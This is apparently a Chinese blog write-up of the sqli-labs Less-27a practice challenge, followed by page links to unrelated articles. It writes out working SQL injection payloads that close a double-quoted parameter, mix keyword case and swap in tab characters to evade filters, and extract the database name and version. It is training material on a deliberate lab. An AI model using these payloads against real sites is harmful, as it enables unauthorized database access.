sqllab第二十七A关通关笔记

I_WORM2024-03-20 20:00

知识点:

  • 双引号闭合
  • union select 大小写绕过
    • Union Select
  • 这里不能进行错误注入,无回显

经过测试发现这是一个双引号闭合

构造payload:id=1"%09and%091="1

页面成功回显

构造payload:id=0"%09uNion%09SElect%091,2,3%09"1

页面成功回显除了输入内容

获取数据库名和版本信息

构造payload:id=0"%09uNion%09SElect%091,database(),version()%09"1

成功获取了数据库名和版本信息

10

相关推荐
愚昧之山绝望之谷开悟之坡7 分钟前
什么agentskill.io大白话说清楚
笔记
其实防守也摸鱼1 小时前
带你了解与配置phpmyadmin
笔记·安全·网络安全·pdf·编辑器·工具·调试
RENMinWanSui!1 小时前
Neo4j-Desktop2.0安装教程(更改安装路径)
笔记·neo4j·neo4j-desktop
噜噜噜阿鲁~1 小时前
python学习笔记 | 8.2、函数式编程-返回函数
笔记·python·学习
江湖有缘2 小时前
容器化部署|Docker搭建Blinko轻量笔记系统
笔记·docker·容器
The_superstar62 小时前
衡山派D133EBS入门笔记
笔记·python·c·衡山派·小曹越
handler012 小时前
Git 核心指令速查
linux·c语言·c++·笔记·git·学习
噜噜噜阿鲁~2 小时前
python学习笔记 | 8.3、函数式编程-匿名函数
笔记·python·学习
YJlio2 小时前
Windows Internals 读书笔记 10.3.3:Task Scheduler 架构详解
人工智能·windows·笔记·python·学习·chatgpt·架构
Lhan.zzZ2 小时前
笔记_2026.4.28_003
c++·笔记·qt·opencv
热门推荐
01GitHub 镜像站点022026年4月AI大事件深度解读:大模型竞争进入“深水区“03Codex 接入 DeepSeek API 完整配置文档04近期有什么ai的新消息,新动态? 2026.4月05【AI】2026 年具身智能模型和世界模型总结062026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot07实测可用|小米 MiMo 百万亿 Token 免费领,开发者速冲08在Windows 11上安装Docker的踩坑记录09裂开!ChatGPT 居然开始要手机号验证,附详细解决方法10零基础教你claude code 接入 deepseek V4